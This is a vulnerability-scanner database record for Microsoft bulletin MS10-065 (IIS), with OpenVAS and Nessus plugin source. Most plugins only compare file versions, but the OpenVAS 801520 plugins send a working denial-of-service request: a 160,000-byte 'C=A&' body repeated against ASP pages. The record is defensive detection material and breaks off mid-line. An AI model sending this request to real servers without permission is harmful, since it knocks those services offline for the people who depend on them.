{"id": "OPENVAS:1361412562310901151", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.", "published": "2010-09-15T00:00:00", "modified": "2020-04-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901151", "reporter": "Copyright (C) 2010 SecPod", "references": ["http://support.microsoft.com/kb/2124261", "http://www.vupen.com/english/advisories/2010/2386", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065"], "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "lastseen": "2020-04-27T19:23:05", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-260", "CPAI-2010-261", "CPAI-2010-262", "CPAI-2013-3631", "CPAI-2013-3648"]}, {"type": "cve", "idList": ["CVE-2010-1899", "CVE-2010-2730", "CVE-2010-2731"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS"]}, {"type": "mskb", "idList": ["KB2267960"]}, {"type": "nessus", "idList": ["IIS_7_PCI.NASL", "IIS_ALTERNATE_DATA_STREAM_AUTHENTICATION_BYPASS.NASL", "SMB_NT_MS10-065.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801520", "OPENVAS:801520", "OPENVAS:901151"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24752", "SECURITYVULNS:VULN:11145"]}, {"type": "seebug", "idList": ["SSV:20120", "SSV:20121", "SSV:20122"]}], "rev": 4}, "score": {"value": 7.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-261", "CPAI-2013-3631"]}, {"type": "cve", "idList": ["CVE-2010-1899", "CVE-2010-2730", "CVE-2010-2731"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS"]}, {"type": "nessus", "idList": ["IIS_7_PCI.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:801520"]}, {"type": "seebug", "idList": ["SSV:20122"]}]}, "exploitation": null, "vulnersScore": 7.6}, "pluginID": "1361412562310901151", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901151\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-09-15 17:01:07 +0200 (Wed, 15 Sep 2010)\");\n script_cve_id(\"CVE-2010-1899\", \"CVE-2010-2730\", \"CVE-2010-2731\");\n script_bugtraq_id(43140, 43138, 41314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2124261\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2386\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"gb_ms_iis_detect_win.nasl\");\n script_mandatory_keys(\"MS/IIS/Ver\", \"SMB/registry_enumerated\");\n script_require_ports(139, 445);\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to bypass restrictions,\n create a denial of service condition or compromise a vulnerable web server.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2K3 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 2 and prior\n\n - Microsoft Internet Information Services (IIS) version 5.1\n\n - Microsoft Internet Information Services (IIS) version 6.0\n\n - Microsoft Internet Information Services (IIS) version 7.0\n\n - Microsoft Internet Information Services (IIS) version 7.5\");\n script_tag(name:\"insight\", value:\"- a stack overflow error in the ASP script processing code when processing\n specially crafted URL requests sent to active server pages, which could be\n exploited to cause a denial of service.\n\n - a buffer overflow error in the FastCGI module when processing malformed\n HTTP headers, which could be exploited by remote attackers to take complete\n control of the affected system via a specially crafted request.\n\n - an error when processing specially crafted URLs, which could be exploited\n to bypass authentication.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\niisVer = get_kb_item(\"MS/IIS/Ver\");\nif(!iisVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"2267960\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\inetsrv\\Asp.dll\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6007\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.6007\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.3790.4735\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.0.3790.4735\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"7.0.6001.18497\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"7.0.6001.18497\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"7.0.6002.18276\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"7.0.6002.18276\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"7.5.7600.16620\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"7.5.7600.16620\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"openvas": [{"lastseen": "2017-07-24T12:49:01", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.", "cvss3": {}, "published": "2010-09-15T00:00:00", "type": "openvas", "title": "Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:901151", "href": "http://plugins.openvas.org/nasl.php?oid=901151", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-065.nasl 6605 2017-07-07 11:22:07Z cfischer $\n#\n# Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to bypass restrictions,\n create a denial of service condition or compromise a vulnerable web server.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Windows 7\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2K3 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 2 and prior.\n Microsoft Windows Server 2008 Service Pack 2 and prior.\n Microsoft Internet Information Services (IIS) version 5.1\n Microsoft Internet Information Services (IIS) version 6.0\n Microsoft Internet Information Services (IIS) version 7.0\n Microsoft Internet Information Services (IIS) version 7.5\";\ntag_insight = \"- a stack overflow error in the ASP script processing code when processing\n specially crafted URL requests sent to active server pages, which could be\n exploited to cause a denial of service.\n - a buffer overflow error in the FastCGI module when processing malformed\n HTTP headers, which could be exploited by remote attackers to take complete\n control of the affected system via a specially crafted request.\n - an error when processing specially crafted URLs, which could be exploited\n to bypass authentication.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/MS10-065\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.\";\n\nif(description)\n{\n script_id(901151);\n script_version(\"$Revision: 6605 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 13:22:07 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-15 17:01:07 +0200 (Wed, 15 Sep 2010)\");\n script_cve_id(\"CVE-2010-1899\", \"CVE-2010-2730\", \"CVE-2010-2731\");\n script_bugtraq_id(43140, 43138, 41314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2124261\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2386\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/MS10-065\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"gb_ms_iis_detect_win.nasl\");\n script_mandatory_keys(\"MS/IIS/Ver\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Confirm IIS\niisVer = get_kb_item(\"MS/IIS/Ver\");\nif(!iisVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\n## Hotfix check\nif(hotfix_missing(name:\"2267960\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\inetsrv\\Asp.dll\");\nif(!sysVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Grep for Asp.dll version < 5.1.2600.6007\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6007\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Grep for Asp.dll version < 6.0.3790.4735\n if(version_is_less(version:sysVer, test_version:\"6.0.3790.4735\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n ## Grep for Asp.dll version < 7.0.6001.18497\n if(version_is_less(version:sysVer, test_version:\"7.0.6001.18497\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Grep for Asp.dll version < 7.0.6002.18276\n if(version_is_less(version:sysVer, test_version:\"7.0.6002.18276\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n ## Grep for Asp.dll version < 7.5.7600.16620\n if(version_is_less(version:sysVer, test_version:\"7.5.7600.16620\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T20:03:05", "description": "The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow vulnerability.", "cvss3": {}, "published": "2010-10-08T00:00:00", "type": "openvas", "title": "Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310801520", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801520", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:iis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801520\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-10-08 08:29:14 +0200 (Fri, 08 Oct 2010)\");\n script_bugtraq_id(43138);\n script_cve_id(\"CVE-2010-2730\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_ms_iis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/installed\");\n\n script_xref(name:\"URL\", value:\"http://bug.zerobox.org/show-2780-1.html\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/15167/\");\n script_xref(name:\"URL\", value:\"http://www.deltadefensesystems.com/blog/?p=217\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote unauthenticated attackers to force\n the IIS server to become unresponsive until the IIS service is restarted manually by the administrator.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Information Services version 6.0.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a stack overflow error in the in the IIS worker\n process which can be exploited using a crafted POST request to hosted 'ASP' pages.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nforeach file( make_list( \"/login.asp\", \"/index.asp\", \"/default.asp\" ) ) {\n\n for( i = 0; i < 10; i++ ) {\n\n string = crap( data:\"C=A&\", length:160000 );\n\n req = string(\"HEAD \", file, \" HTTP/1.1 \\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Connection:Close \\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded \\r\\n\",\n \"Content-Length:\", strlen(string),\"\\r\\n\\r\\n\", string);\n res = http_send_recv( port:port, data:req );\n\n if( ereg( pattern:\"^HTTP/1\\.[01] 503\", string:res ) &&\n ( \"Service Unavailable\" >< res ) ) {\n report = http_report_vuln_url( port:port, url:file );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:59", "description": "The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow vulnerability.", "cvss3": {}, "published": "2010-10-08T00:00:00", "type": "openvas", "title": "Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2017-02-17T00:00:00", "id": "OPENVAS:801520", "href": "http://plugins.openvas.org/nasl.php?oid=801520", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_iis_bof_vuln.nasl 5323 2017-02-17 08:49:23Z teissa $\n#\n# Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the remote unauthenticated attackers to force\n the IIS server to become unresponsive until the IIS service is restarted manually\n by the administrator.\n Impact Level: Application\";\ntag_affected = \"Microsoft Internet Information Services version 6.0\";\ntag_insight = \"The flaw is due to a stack overflow error in the in the IIS worker\n process which can be exploited using a crafted POST request to hosted 'ASP'\n pages.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx\";\ntag_summary = \"The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(801520);\n script_version(\"$Revision: 5323 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-17 09:49:23 +0100 (Fri, 17 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-08 08:29:14 +0200 (Fri, 08 Oct 2010)\");\n script_bugtraq_id(43138);\n script_cve_id(\"CVE-2010-2730\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://bug.zerobox.org/show-2780-1.html\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/15167/\");\n script_xref(name : \"URL\" , value : \"http://www.deltadefensesystems.com/blog/?p=217\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_ms_iis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\n\niisPort = get_http_port(default:80);\nif(!iisPort){\n exit(0);\n}\n\niisVer = get_kb_item(\"IIS/\" + iisPort + \"/Ver\");\nif(!iisVer){\n exit(0);\n}\n\nif(!safe_checks()){\n exit(0);\n}\n\n## checking for possible default files\nforeach files (make_list(\"login.asp\", \"index.asp\", \"default.asp\"))\n{\n for(i=0; i<10; i++)\n {\n ## Construct the request\n string = crap(data:\"C=A&\", length:160000);\n\n ## send the crafted request multiple times\n request = string(\"HEAD /\", files, \" HTTP/1.1 \\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Connection:Close \\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded \\r\\n\",\n \"Content-Length:\", strlen(string),\"\\r\\n\\r\\n\", string);\n response = http_send_recv(port:iisPort, data:request);\n\n ## Check the service status after exploit\n if(ereg(pattern:\"^HTTP/[0-9]\\.[0-9] 503 .*\", string:response) &&\n (\"Service Unavailable\" >< response))\n {\n security_message(port:iisPort);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-08-19T13:03:06", "description": "The version of IIS installed on the remote host has the following vulnerabilities :\n\n - Sending a specially crafted request for an ASP page on a website hosted by IIS can result in a denial of service. (CVE-2010-1899)\n\n - Sending a specially crafted HTTP request to an IIS server with FastCGI enabled can result in remote code execution. (CVE-2010-2730)\n\n - Sending a specially crafted request to an IIS server running on Windows XP can allow a remote attacker to bypass the need to authenticate to access restricted resources. (CVE-2010-2731)", "cvss3": {"score": null, "vector": null}, "published": "2010-09-14T00:00:00", "type": "nessus", "title": "MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1899", "CVE-2010-2730", "CVE-2010-2731"], "modified": "2020-08-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-065.NASL", "href": "https://www.tenable.com/plugins/nessus/49223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(49223);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2010-1899\", \"CVE-2010-2730\", \"CVE-2010-2731\");\n script_bugtraq_id(41314, 43138, 43140);\n script_xref(name:\"IAVA\", value:\"2010-A-0120-S\");\n script_xref(name:\"MSFT\", value:\"MS10-065\");\n script_xref(name:\"MSKB\", value:\"2124261\");\n script_xref(name:\"MSKB\", value:\"2271195\");\n script_xref(name:\"MSKB\", value:\"2290570\");\n\n script_name(english:\"MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\");\n script_summary(english:\"Checks versions of Asp.dll / Cgi.dll / Infocomm.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server may allow remote code execution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of IIS installed on the remote host has the following\nvulnerabilities :\n\n - Sending a specially crafted request for an ASP page\n on a website hosted by IIS can result in a denial of\n service. (CVE-2010-1899)\n\n - Sending a specially crafted HTTP request to an IIS\n server with FastCGI enabled can result in remote\n code execution. (CVE-2010-2730)\n\n - Sending a specially crafted request to an IIS server\n running on Windows XP can allow a remote attacker to\n bypass the need to authenticate to access restricted\n resources. (CVE-2010-2731)\"\n );\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-065\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?fcfe6e78\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for IIS on Windows XP, 2003,\nVista, 2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-065';\nkbs = make_list(\"2124261\", \"2271195\", \"2290570\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_iis_installed() <= 0) audit(AUDIT_NOT_INST, \"IIS\");\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) 